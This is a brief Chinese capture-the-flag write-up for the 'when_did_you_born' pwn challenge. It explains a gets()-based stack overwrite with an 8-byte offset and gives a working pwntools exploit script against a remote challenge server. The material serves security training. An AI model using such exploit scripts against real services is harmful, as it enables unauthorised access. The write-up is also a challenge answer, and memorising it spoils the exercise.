攻防世界(3):when_did_you_born

本题是简单的栈覆盖，先查壳checksec 发现没开Pie

ida显示自相矛盾

看到gets想到利用v4将v5覆盖，查看栈帧发现0x18与0x20之间差8，直接写exp

#!/usr/bin/env python
from pwn import *
p = remote('111.200.241.244',31197) 
p.recvuntil("What's Your Birth?")
p.sendline('1234')
p.recvuntil("What's Your Name?")
p.sendline('a'*8 + p64(1926))
p.interactive()